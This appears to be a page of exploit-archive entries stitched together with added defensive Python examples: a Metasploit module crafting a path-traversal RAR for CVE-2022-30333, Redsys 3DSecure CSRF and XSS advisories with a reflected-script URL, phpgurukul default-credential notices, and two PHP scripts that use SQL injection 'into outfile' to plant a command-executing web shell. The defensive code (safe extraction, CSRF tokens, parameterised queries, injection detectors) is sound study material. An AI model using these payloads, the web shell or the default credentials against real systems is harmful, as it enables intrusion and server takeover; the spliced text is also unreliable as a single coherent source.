<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /><br /> include Msf::Exploit::FILEFORMAT<br /> include Msf::Exploit::EXE<br /> include Msf::Exploit::Format::RarSymlinkPathTraversal<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'UnRAR Path Traversal (CVE-2022-30333)',<br /> 'Description' => %q{<br /> This module creates a RAR file that exploits CVE-2022-30333, which is a<br /> path-traversal vulnerability in unRAR that can extract an arbitrary file<br /> to an arbitrary location on a Linux system. UnRAR fixed this<br /> vulnerability in version 6.12 (open source version 6.1.7).<br /><br /> The core issue is that when a symbolic link is unRAR'ed, Windows<br /> symbolic links are not properly validated on Linux systems and can<br /> therefore write a symbolic link that points anywhere on the filesystem.<br /> If a second file in the archive has the same name, it will be written<br /> to the symbolic link path.<br /> },<br /> 'Author' => [<br /> 'Simon Scannell', # Discovery / initial disclosure (via Sonar)<br /> 'Ron Bowes', # Analysis, PoC, and module<br /> ],<br /> 'License' => MSF_LICENSE,<br /> 'References' => [<br /> ['CVE', '2022-30333'],<br /> ['URL', 'https://blog.sonarsource.com/zimbra-pre-auth-rce-via-unrar-0day/'],<br /> ['URL', 'https://github.com/pmachapman/unrar/commit/22b52431a0581ab5d687747b65662f825ec03946'],<br /> ['URL', 'https://attackerkb.com/topics/RCa4EIZdbZ/cve-2022-30333/rapid7-analysis'],<br /> ],<br /> 'Platform' => 'linux',<br /> 'Arch' => [ARCH_X86, ARCH_X64],<br /> 'Targets' => [<br /> [ 'Generic RAR file', {} ]<br /> ],<br /> 'DefaultTarget' => 0,<br /> 'Privileged' => false,<br /> 'DisclosureDate' => '2022-06-28',<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 
'Reliability' => [],<br /> 'SideEffects' => []<br /> }<br /> )<br /> )<br /><br /> register_options(<br /> [<br /> OptString.new('FILENAME', [ false, 'The file name.', 'payload.rar']),<br /> OptString.new('CUSTOM_PAYLOAD', [ false, 'A custom payload to encode' ]),<br /> OptString.new('TARGET_PATH', [ true, 'The location the payload should extract to (can, and should, contain path traversal characters - "../../" - as well as a filename).']),<br /> OptString.new('SYMLINK_FILENAME', [ true, 'The name of the symlink file to use (must be 12 characters or less; default: random)', Rex::Text.rand_text_alpha_lower(4..12)])<br /> ]<br /> )<br /> end<br /><br /> def exploit<br /> print_status("Target filename: #{datastore['TARGET_PATH']}")<br /><br /> if datastore['CUSTOM_PAYLOAD'].present?<br /> print_status("Encoding custom payload file: #{datastore['CUSTOM_PAYLOAD']}")<br /> payload_data = File.binread(datastore['CUSTOM_PAYLOAD'])<br /><br /> # Append a newline + NUL byte, since random data will be appended and we<br /> # don't want to break shellscripts<br /> payload_data.concat("\n\0")<br /> else<br /> print_status('Encoding configured payload')<br /> payload_data = generate_payload_exe<br /> end<br /><br /> begin<br /> rar = encode_as_traversal_rar(datastore['SYMLINK_FILENAME'], datastore['TARGET_PATH'], payload_data)<br /> rescue StandardError => e<br /> fail_with(Failure::BadConfig, "Failed to encode RAR file: #{e}")<br /> end<br /><br /> file_create(rar)<br /> end<br />end<br /></code></pre>
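The module description above names the two halves of CVE-2022-30333: a Windows-style symlink target (backslash separators) was not validated when the archive was unpacked on Linux, and a later entry with the same name was then written through the planted link. As an added example, not part of the Metasploit module or of unrar, the Python sketch of an extractor below shows the two checks that close this class of bug: normalise separators and resolve every link target against the extraction root, and create regular files with O_EXCL|O_NOFOLLOW so nothing is ever written through a pre-existing link. The archive entries are constructed dicts, not output of a RAR parser, and the temporary directory stands in for the user's extraction directory.

```python
import os
import posixpath
import tempfile


def normalize_separators(path: str) -> str:
    """Treat backslashes as path separators. A Windows-style target such as
    '..\\..\\etc\\cron.d' must be checked exactly like '../../etc/cron.d' when the
    archive is unpacked on Linux; leaving backslashes untouched is the mistake
    behind CVE-2022-30333."""
    return path.replace("\\", "/")


def resolve_inside(root: str, relative: str):
    """Normalized absolute destination of `relative` under `root`, or None when
    it is absolute or climbs out of root through '..' components."""
    relative = normalize_separators(relative)
    if posixpath.isabs(relative):
        return None
    full = posixpath.normpath(posixpath.join(root, relative))
    if full == root or full.startswith(root + "/"):
        return full
    return None


def symlink_is_safe(root: str, link_name: str, target: str) -> bool:
    """A link is only written if the link itself and what it points at
    (resolved relative to the link's own directory) both stay inside root."""
    if resolve_inside(root, link_name) is None:
        return False
    link_dir = posixpath.dirname(normalize_separators(link_name))
    return resolve_inside(root, posixpath.join(link_dir, target)) is not None


def extract(root: str, entries):
    """Unpack constructed entries ({'name', 'symlink': target} or {'name', 'data': bytes}).
    Returns (written, rejected). Regular files are created with O_EXCL|O_NOFOLLOW, so
    even if a symlink of the same name already exists on disk the data is never
    written through it; the exploit depends on exactly that name reuse."""
    root = posixpath.normpath(root)
    written, rejected = [], []
    for entry in entries:
        name = entry["name"]
        dest = resolve_inside(root, name)
        if dest is None or dest == root:
            rejected.append(name)
            continue
        if "symlink" in entry:
            if not symlink_is_safe(root, name, entry["symlink"]):
                rejected.append(name)
                continue
            os.makedirs(posixpath.dirname(dest), exist_ok=True)
            try:
                os.symlink(normalize_separators(entry["symlink"]), dest)
            except FileExistsError:
                rejected.append(name)
                continue
        else:
            os.makedirs(posixpath.dirname(dest), exist_ok=True)
            flags = os.O_WRONLY | os.O_CREAT | os.O_EXCL | getattr(os, "O_NOFOLLOW", 0)
            try:
                fd = os.open(dest, flags, 0o644)
            except FileExistsError:
                rejected.append(name)
                continue
            with os.fdopen(fd, "wb") as fh:
                fh.write(entry["data"])
        written.append(name)
    return written, rejected


def demo() -> dict:
    """Constructed archive modelled on the advisory: a Windows-style link that climbs
    out of the extraction directory, then a regular file reusing the link's name."""
    root = tempfile.mkdtemp(prefix="unrar-demo-")
    entries = [
        {"name": "dropper", "symlink": "..\\..\\..\\..\\tmp\\target-dir\\file"},
        {"name": "dropper", "data": b"<constructed payload bytes>"},
        {"name": "docs/readme.txt", "data": b"hello"},
        {"name": "docs/latest", "symlink": "readme.txt"},       # safe: stays in root
        {"name": "docs/latest", "data": b"overwrite attempt"},  # refused by O_EXCL
    ]
    written, rejected = extract(root, entries)
    return {
        "written": written,
        "rejected": rejected,
        "dropper_is_link": os.path.islink(os.path.join(root, "dropper")),
        "latest_points_to": os.readlink(os.path.join(root, "docs", "latest")),
    }


if __name__ == "__main__":
    print(demo())
```

The first check alone is not enough: a link that legitimately points inside the root can still be abused if a later entry is allowed to follow it, which is why the file-creation flags matter as much as the path validation.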
<pre><code>Product: 3DSecure 2.0<br />Manufacturer: Redsys<br />Affected Version(s): 3DSecure 2.0 3DS Authorization Method<br />Tested Version(s): 3DSecure 2.0 3DS Authorization Method<br />Vulnerability Type: Cross-Site Request Forgery (CSRF)<br />Risk Level: Medium<br />Solution Status: Not yet fixed<br />Manufacturer Notification: 2024-01-17<br />Solution Date: N/A<br />Public Disclosure: 2024-09-17<br />CVE Reference: CVE-2024-25286<br /><br />Overview:<br />A Cross-Site Request Forgery (CSRF) vulnerability was identified in the Authorization Method of 3DSecure 2.0, allowing attackers to submit unauthorized form data by modifying the HTTP Origin and Referer headers.<br /><br />Vulnerability Details:<br />By altering the Origin and Referer headers, attackers can trick the server into processing unauthorized transactions.<br /><br />Solution:<br />No solution is currently available. Redsys has been notified.<br /><br />References:<br />OWASP Web Security Testing Guide: CSRF<br /><br />Discoverer:<br />Reported by Rubén López Herrera<br /><br />________________________________<br /><br />The information contained in this transmission is confidential and privileged information intended only for the use of the individual or entity named above. If the reader of this message is not the intended recipient, you are hereby notified that any dissemination, distribution or copying of this communication is strictly prohibited. If you have received this transmission in error, do not read it. Please immediately reply to the sender that you have received this communication in error and then delete it.<br /><br /></code></pre>
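The advisory above describes a server that decides whether to process the authorization form from the Origin and Referer headers, which an attacker can supply. As an added example, not Redsys code, the Python below shows the control that does not depend on those headers: a synchronizer token derived from the session that the server embeds in its own form and verifies in constant time, with the Origin/Referer check kept only as defence in depth. The secret, the allowed origin, the session ids and the form field names are constructed for the example.

```python
import hashlib
import hmac
import secrets
from urllib.parse import urlsplit

# Constructed for this example: the server-side secret and the origin from which
# the authorization form is legitimately posted.
SERVER_SECRET = secrets.token_bytes(32)
ALLOWED_ORIGINS = frozenset({"https://3ds.issuer.example"})


def issue_csrf_token(session_id: str, secret: bytes = SERVER_SECRET) -> str:
    """Synchronizer token: an HMAC over the session id. The server writes it into
    the form it serves; a cross-site page cannot read it and so cannot supply it."""
    return hmac.new(secret, session_id.encode("utf-8"), hashlib.sha256).hexdigest()


def origin_of(headers: dict):
    """Prefer Origin and fall back to the Referer's scheme+host. Both are
    attacker-controlled in the scenario the advisory describes, so this is
    advisory input only."""
    origin = headers.get("Origin")
    if origin:
        return origin.rstrip("/")
    referer = headers.get("Referer")
    if referer:
        parts = urlsplit(referer)
        if parts.scheme and parts.netloc:
            return f"{parts.scheme}://{parts.netloc}"
    return None


def verify_authorization_post(headers: dict, form: dict, session_id: str,
                              secret: bytes = SERVER_SECRET,
                              allowed_origins=ALLOWED_ORIGINS):
    """Return None when the request may be processed, otherwise the reason for
    refusing it. The token check is the real control; origin is checked second
    and only as defence in depth."""
    supplied = str(form.get("csrf_token", ""))
    expected = issue_csrf_token(session_id, secret)
    if not hmac.compare_digest(supplied.encode("utf-8"), expected.encode("utf-8")):
        return "missing or invalid CSRF token"
    origin = origin_of(headers)
    if origin is None or origin not in allowed_origins:
        return "origin not allowed"
    return None


def demo():
    """Constructed requests: a legitimate post, a post with convincing headers but
    no token, a token minted for another session, and a good token from a bad origin."""
    session = "sess-1234"
    good = verify_authorization_post(
        {"Origin": "https://3ds.issuer.example"},
        {"csrf_token": issue_csrf_token(session), "authorization_data": "..."}, session)
    headers_only = verify_authorization_post(
        {"Origin": "https://3ds.issuer.example", "Referer": "https://3ds.issuer.example/auth"},
        {"authorization_data": "..."}, session)
    wrong_session = verify_authorization_post(
        {"Origin": "https://3ds.issuer.example"},
        {"csrf_token": issue_csrf_token("sess-other")}, session)
    bad_origin = verify_authorization_post(
        {"Origin": "https://evil.example"},
        {"csrf_token": issue_csrf_token(session)}, session)
    return good, headers_only, wrong_session, bad_origin


if __name__ == "__main__":
    print(demo())
```

Binding the token to the session (rather than to a cookie the browser sends automatically) is what makes the forged-header request fail: the attacker can set any Origin they like, but they cannot produce the HMAC for a session they do not hold.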
<pre><code>Product: 3DSecure 2.0<br />Manufacturer: Redsys<br />Affected Version(s): 3DSecure 2.0 3DS Method Authentication<br />Tested Version(s): 3DSecure 2.0 3DS Method Authentication<br />Vulnerability Type: Cross-Site Scripting (XSS)<br />Risk Level: Medium<br />Solution Status: Not yet fixed<br />Manufacturer Notification: 2024-01-17<br />Solution Date: N/A<br />Public Disclosure: 2024-09-17<br />CVE Reference: CVE-2024-25285<br /><br />Overview:<br />3DSecure 2.0 is vulnerable to form action hijacking via the threeDSMethodNotificationURL parameter. This flaw allows attackers to change the destination website for form submissions, enabling data theft.<br /><br />Vulnerability Details:<br />The threeDSMethodNotificationURL parameter is vulnerable to modification, allowing attackers to redirect form submissions to malicious destinations.<br /><br />Proof of Concept (PoC):<br />By modifying the threeDSMethodNotificationURL parameter in a POST request, an attacker can change the form's action URL. Example:<br /><br />https://sis-d.redsys.es/sis-simulador-web/threeDsMethod.jsp?threeDSMethodData=eyJ0aHJlZURTTWV0aG9kTm90aWZpY2F0aW9uVVJMIjoiaHR0cHM6Ly9hdHRhY2tlci5jb20iLCJ0aHJlZURTU2VydmVyVHJhbnNJRCI6IjM5NDA4Mzk2LTdjY2MtNGU4YS04NjU2LThmMTZlNmNlMDQ5OCJ9%3d%3dld4ga%22%3e%3cscript%3ealert(1)%3c%2fscript%3epsoojei88ze<br /><br />Solution:<br />No solution is currently available. Redsys has been notified.<br /><br />References:<br />OWASP Web Security Testing Guide: Form Action Hijacking<br /><br />Discoverer:<br />Reported by Rubén López Herrera<br /><br /></code></pre>
<pre><code>Product: 3DSecure 2.0<br />Manufacturer: Redsys<br />Affected Version(s): 3DSecure 2.0 3DS Authorization Method<br />Tested Version(s): 3DSecure 2.0 3DS Authorization Method<br />Vulnerability Type: Cross-Site Scripting (XSS)<br />Risk Level: Medium<br />Solution Status: Not yet fixed<br />Manufacturer Notification: 2024-01-17<br />Solution Date: N/A<br />Public Disclosure: 2024-09-17<br />CVE Reference: CVE-2024-25284<br /><br />Overview:<br />Multiple reflected Cross-Site Scripting (XSS) vulnerabilities in the 3DS Authorization Method of 3DSecure 2.0 allow attackers to inject arbitrary web scripts via the threeDSMethodData parameter.<br /><br />Vulnerability Details:<br />The threeDSMethodData parameter is not sanitized before being processed, allowing attackers to inject scripts by concatenating code or modifying the base64-encoded information.<br /><br />Proof of Concept (PoC):<br />An attacker can manipulate the threeDSMethodData parameter in the request URL to inject malicious code. Example:<br /><br />https://sis-d.redsys.es/sis-simulador-web/threeDsMethod.jsp?threeDSMethodData=eyJ0aHJlZURTTWV0aG9kTm90aWZpY2F0aW9uVVJMIjoiaHR0cHM6Ly9hdHRhY2tlci5jb20iLCJ0aHJlZURTU2VydmVyVHJhbnNJRCI6IjM5NDA4Mzk2LTdjY2MtNGU4YS04NjU2LThmMTZlNmNlMDQ5OCJ9%3d%3dld4ga%22%3e%3cscript%3ealert(1)%3c%2fscript%3epsoojei88ze<br /><br />Solution:<br />No solution is currently available. Redsys has been notified of the issue.<br /><br />References:<br />OWASP Web Security Testing Guide: Reflected Cross-Site Scripting<br /><br />Discoverer:<br />Reported by Rubén López Herrera<br /><br /></code></pre>
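The two advisories above (CVE-2024-25285 and CVE-2024-25284) share one root cause: threeDSMethodData is decoded loosely and then reflected into the page, so both a suffix appended after the base64 and a substituted notification URL reach the markup. As an added example, not Redsys code and not an EMVCo reference implementation, the Python below shows server-side handling that closes both: strict base64url/JSON decoding that refuses any character outside the alphabet, an allowlist of registered 3DS Server hosts for threeDSMethodNotificationURL, and HTML escaping of everything reflected. The registered host set, the merchant hostname and the transaction id are constructed placeholders.

```python
import base64
import binascii
import html
import json
import re
from urllib.parse import urlsplit

# Only the base64url alphabet, optionally padded. A trailing '"><script>' or any
# other appended junk fails this test before anything is decoded or reflected.
B64URL_RE = re.compile(r"^[A-Za-z0-9_-]+={0,2}$")
REQUIRED_FIELDS = ("threeDSServerTransID", "threeDSMethodNotificationURL")

# Constructed for this example: hosts of 3DS Servers registered with this ACS/DS
# and therefore allowed to receive the 3DS Method notification.
REGISTERED_HOSTS = frozenset({"3ds.merchant.example"})


def decode_method_data(raw: str) -> dict:
    """Strictly decode threeDSMethodData (base64url-encoded JSON object)."""
    if not isinstance(raw, str) or len(raw) > 4096 or not B64URL_RE.match(raw):
        raise ValueError("threeDSMethodData is not base64url")
    unpadded = raw.rstrip("=")
    padded = unpadded + "=" * (-len(unpadded) % 4)
    try:
        data = json.loads(base64.urlsafe_b64decode(padded).decode("utf-8"))
    except (binascii.Error, UnicodeDecodeError, json.JSONDecodeError) as exc:
        raise ValueError(f"threeDSMethodData does not decode: {exc}") from exc
    if not isinstance(data, dict) or any(not isinstance(data.get(k), str) for k in REQUIRED_FIELDS):
        raise ValueError("threeDSMethodData lacks the required string fields")
    return data


def validate_notification_url(url: str, registered_hosts=REGISTERED_HOSTS) -> str:
    """The form action may only point at a registered 3DS Server over https.
    urlsplit().hostname is compared, so 'https://good@evil/' or 'good.evil' cannot pass."""
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    if parts.scheme != "https" or host not in registered_hosts:
        raise ValueError("threeDSMethodNotificationURL host is not registered")
    return url


def render_method_form(raw: str, registered_hosts=REGISTERED_HOSTS) -> str:
    """Build the auto-posting 3DS Method form. Every reflected value is escaped
    with quote=True, including the ones that already passed validation."""
    data = decode_method_data(raw)
    action = validate_notification_url(data["threeDSMethodNotificationURL"], registered_hosts)
    return (
        '<form method="POST" action="{action}">'
        '<input type="hidden" name="threeDSMethodData" value="{raw}">'
        "</form>"
    ).format(action=html.escape(action, quote=True), raw=html.escape(raw, quote=True))


def is_rejected(raw: str, registered_hosts=REGISTERED_HOSTS) -> bool:
    """True when the request would be refused instead of rendered."""
    try:
        render_method_form(raw, registered_hosts)
    except ValueError:
        return True
    return False


def make_method_data(url: str, trans_id: str) -> str:
    """Encode a threeDSMethodData value the way a 3DS Server would (constructed sample)."""
    body = json.dumps({"threeDSServerTransID": trans_id, "threeDSMethodNotificationURL": url})
    return base64.urlsafe_b64encode(body.encode("utf-8")).decode("ascii").rstrip("=")


# Constructed samples: a legitimate value, the same value with the kind of suffix the
# advisory shows appended, and a value whose notification URL names another host.
TRANS_ID = "00000000-0000-4000-8000-000000000000"
GOOD = make_method_data("https://3ds.merchant.example/3ds/notify", TRANS_ID)
TAMPERED = GOOD + '"><script>alert(1)</script>'
HIJACKED = make_method_data("https://attacker.example/", TRANS_ID)

if __name__ == "__main__":
    print(render_method_form(GOOD))
    print("tampered rejected:", is_rejected(TAMPERED), "hijacked rejected:", is_rejected(HIJACKED))
```

The escaping step is the one that prevents script injection even when validation has a gap; the allowlist is the one that prevents the form action from leaving the set of hosts the directory server actually knows about.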
<pre><code>Product: 3DSecure 2.0<br />Manufacturer: Redsys<br />Affected Version(s): 3DSecure 2.0 3DS Authorization Challenge<br />Tested Version(s): 3DSecure 2.0 3DS Authorization Challenge<br />Vulnerability Type: Cross-Site Scripting (XSS)<br />Risk Level: Medium<br />Solution Status: Not yet fixed<br />Manufacturer Notification: 2024-01-17<br />Solution Date: N/A<br />Public Disclosure: 2024-09-17<br />CVE Reference: CVE-2024-25283<br /><br />Overview:<br />Multiple reflected Cross-Site Scripting (XSS) vulnerabilities exist in the 3DS Authorization Challenge of 3DSecure 2.0. These flaws allow attackers to inject arbitrary web scripts, CSS, or HTML through the manipulation of the params parameter in the request URL.<br /><br />Vulnerability Details:<br />The params parameter in the 3DS Authorization Challenge is vulnerable to code injection. This flaw occurs because the value entered into the parameter is not sanitized, allowing attackers to create new HTML elements in the DOM and execute malicious code in the victim's browser.<br /><br />Proof of Concept (PoC):<br />An attacker can alter the base64-encoded params parameter in the request URL to inject arbitrary code. Example:<br /><br />https://[REDACTED]/[REDACTED]/rest/online/[REDACTED]/redirect?action=challenge&txn=[REDACTED]&params=[REDACTED]"<br /><br />References:<br />OWASP Web Security Testing Guide: Reflected Cross-Site Scripting<br /><br />Discoverer:<br />Reported by Rubén López Herrera<br /><br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : Nipah virus (NiV) – Testing Management System 1.0 php code injection Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) |<br />| # Vendor : https://phpgurukul.com/nipah-virus-niv-testing-management-system-using-php-and-mysql/ |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking in Google or other search engines.<br /><br />[+] This payload injects PHP code that contains a backdoor.<br /><br />[+] Lines 16 and 19: set your target.<br /><br />[+] save payload as poc.php<br /><br />[+] usage from cmd : C:\www\test>php 1.php<br /><br />[+] payload :<br /><br /><br /><?php<br />// Required libraries<br />function send_request($url, $data) {<br /> $options = [<br /> 'http' => [<br /> 'header' => "Content-Type: application/x-www-form-urlencoded\r\n",<br /> 'method' => 'POST',<br /> 'content' => http_build_query($data),<br /> ]<br /> ];<br /> $context = stream_context_create($options);<br /> return file_get_contents($url, false, $context);<br />}<br /><br />// Set a fixed URL<br />$url = 'http://localhost/nipah-tms/';<br /><br />// Fixed path for the uploaded file<br />$path = 'C:\www\nipah-tms\uploaded.php';<br />$path = str_replace("\\", "\\\\", $path);<br /><br />// Backdoor payload<br />$backdoor_payload = '<?php if (isset($_GET["cmd"])) { system($_GET["cmd"]); } ?>';<br /><br />// Send a PHP file containing the backdoor<br />$payload = [<br /> 'username' => "admin' union select '" . addslashes($backdoor_payload) . "' into outfile '" . $path . "' -- 'a",<br /> 'password' => 'test',<br /> 'login' => ''<br />];<br />send_request($url . "/login.php", $payload);<br /><br />echo "[+] PHP backdoor uploaded successfully at $path\n";<br /><br />// Execute the uploaded PHP file and test the backdoor<br />$response = file_get_contents($url . "uploaded.php?cmd=whoami");<br />echo "[+] Response from the backdoor (executing 'whoami'): \n$response\n";<br />?><br /><br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Medical Card Generations System 1.0 Sql injection Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) |<br />| # Vendor : https://phpgurukul.com/medical-card-generation-system-using-php-and-mysql/ |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking in Google or other search engines.<br /><br />[+] use payload : view-card-detail.php?viewid=1 <==== inject here <br /><br />[+] http://127.0.0.1/mcgs/view-card-detail.php?viewid=1<br /><br /><br />Greetings to :==================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |<br />================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Maid Hiring Management System 1.0 Insecure Settings Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) |<br />| # Vendor : https://phpgurukul.com/maid-hiring-management-system-using-php-and-mysql/ |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking in Google or other search engines.<br /><br />[+] Insecure Settings : appears to leave a default administrative account in place post installation.<br /><br />[+] use payload : <br /><br /> Username: admin<br /> <br /> Password: Test@123<br /><br />[+] http://127.0.0.1/mhms/admin/dashboard.php<br /><br /><br />Greetings to :==================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |<br />================================================================<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : Emergency Ambulance Hiring Portal 1.0 php code injection Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) |<br />| # Vendor : https://phpgurukul.com/emergency-ambulance-hiring-portal-using-php-and-mysql/ |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking in Google or other search engines.<br /><br />[+] This payload injects PHP code that contains a backdoor.<br /><br />[+] Lines 16 and 19: set your target.<br /><br />[+] save payload as poc.php<br /><br />[+] usage from cmd : C:\www\test>php 1.php<br /><br />[+] payload :<br /><br /><br /><?php<br />// Required libraries<br />function send_request($url, $data) {<br /> $options = [<br /> 'http' => [<br /> 'header' => "Content-Type: application/x-www-form-urlencoded\r\n",<br /> 'method' => 'POST',<br /> 'content' => http_build_query($data),<br /> ]<br /> ];<br /> $context = stream_context_create($options);<br /> return file_get_contents($url, false, $context);<br />}<br /><br />// Set a fixed URL<br />$url = 'http://localhost/eahp/';<br /><br />// Fixed path for the uploaded file<br />$path = 'C:\www\eahp\uploaded.php';<br />$path = str_replace("\\", "\\\\", $path);<br /><br />// Backdoor payload<br />$backdoor_payload = '<?php if (isset($_GET["cmd"])) { system($_GET["cmd"]); } ?>';<br /><br />// Send a PHP file containing the backdoor<br />$payload = [<br /> 'username' => "admin' union select '" . addslashes($backdoor_payload) . "' into outfile '" . $path . "' -- 'a",<br /> 'password' => 'test',<br /> 'login' => ''<br />];<br />send_request($url . "/admin/login.php", $payload);<br /><br />echo "[+] PHP backdoor uploaded successfully at $path\n";<br /><br />// Execute the uploaded PHP file and test the backdoor<br />$response = file_get_contents($url . "uploaded.php?cmd=whoami");<br />echo "[+] Response from the backdoor (executing 'whoami'): \n$response\n";<br />?><br /><br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
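The two phpgurukul PoCs above (Nipah virus TMS and Emergency Ambulance Hiring Portal) and the Medical Card SQL injection advisory all come down to a login or lookup query assembled by string concatenation, which is what lets a username carry `union select ... into outfile`. As an added example, not code from the advisories or from phpgurukul, here is the server-side handling that removes the bug, written in Python with an in-memory sqlite database standing in for MySQL: a parameterised lookup, salted PBKDF2 password verification, and a small detector for the query shapes these PoCs use that a defender can run over submitted forms for alerting. The table, the credentials and the sample submissions are constructed; the payload string mirrors the PoC's shape with a placeholder path and no backdoor body.

```python
import hashlib
import hmac
import os
import re
import sqlite3

PBKDF2_ROUNDS = 200_000


def hash_password(password: str, salt: bytes = None) -> str:
    """Salted PBKDF2-HMAC-SHA256, stored as 'salthex$digesthex'."""
    salt = salt if salt is not None else os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, PBKDF2_ROUNDS)
    return salt.hex() + "$" + digest.hex()


def verify_password(password: str, stored: str) -> bool:
    salt_hex, digest_hex = stored.split("$", 1)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                                 bytes.fromhex(salt_hex), PBKDF2_ROUNDS)
    return hmac.compare_digest(digest.hex(), digest_hex)


def build_demo_db() -> sqlite3.Connection:
    """Constructed stand-in for the application's admin table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE admin (id INTEGER PRIMARY KEY, "
                 "username TEXT UNIQUE NOT NULL, password_hash TEXT NOT NULL)")
    conn.execute("INSERT INTO admin (username, password_hash) VALUES (?, ?)",
                 ("admin", hash_password("correct horse battery staple")))
    conn.commit()
    return conn


def login(conn: sqlite3.Connection, username: str, password: str):
    """Parameterised lookup: the username is bound as a value, never spliced into
    the SQL text, so quotes, UNION SELECT and INTO OUTFILE inside it are only
    characters of a name that does not exist. Returns the user id or None."""
    row = conn.execute("SELECT id, password_hash FROM admin WHERE username = ?",
                       (username,)).fetchone()
    if row is None:
        return None
    return row[0] if verify_password(password, row[1]) else None


# Query fragments the PoCs rely on; cheap to match on submitted form fields.
INJECTION_MARKERS = re.compile(
    r"(?i)\bunion\s+(all\s+)?select\b|\binto\s+(out|dump)file\b|'\s*(or|and)\s*'|--\s"
)


def suspicious_fields(form: dict) -> list:
    """Detection for alerting or WAF logs: names of fields whose value carries an
    injection shape. A detector to complement the parameterised query, not a filter
    that replaces it."""
    return [name for name, value in form.items()
            if isinstance(value, str) and INJECTION_MARKERS.search(value)]


# Constructed input mirroring the PoC's shape (placeholder path, no backdoor body).
PAGE_STYLE_PAYLOAD = "admin' union select 'x' into outfile '/var/www/html/x.php' -- 'a"


def demo() -> dict:
    conn = build_demo_db()
    return {
        "valid_login": login(conn, "admin", "correct horse battery staple"),
        "injected_login": login(conn, PAGE_STYLE_PAYLOAD, "test"),
        "wrong_password": login(conn, "admin", "Test@123"),
        "flagged": suspicious_fields({"username": PAGE_STYLE_PAYLOAD, "password": "test"}),
        "clean": suspicious_fields({"username": "admin", "password": "Test@123"}),
    }


if __name__ == "__main__":
    print(demo())
```

On the MySQL side the same class of PoC is also blocked at the database layer when the application account lacks the FILE privilege and `secure_file_priv` is set, since `INTO OUTFILE` then fails even if an injection exists; the parameterised query remains the fix, the privilege settings are the second layer. The two "Insecure Settings" advisories on this page are the reminder that none of this helps while a documented default account is still live after installation.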
<pre><code>====================================================================================================================================<br />| # Title : Doctor Appointment Management System 1.0 Insecure Settings Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) |<br />| # Vendor : https://phpgurukul.com/doctor-appointment-management-system-using-php-and-mysql/ |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking in Google or other search engines.<br /><br />[+] Insecure Settings : appears to leave a default administrative account in place post installation.<br /><br />[+] use payload : <br /><br /> Username: anu@gmail.com<br /> <br /> Password: Test@123<br /><br />[+] http://127.0.0.1/dams/doctor/dashboard.php<br /><br /><br />Greetings to :==================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |<br />================================================================<br /></code></pre>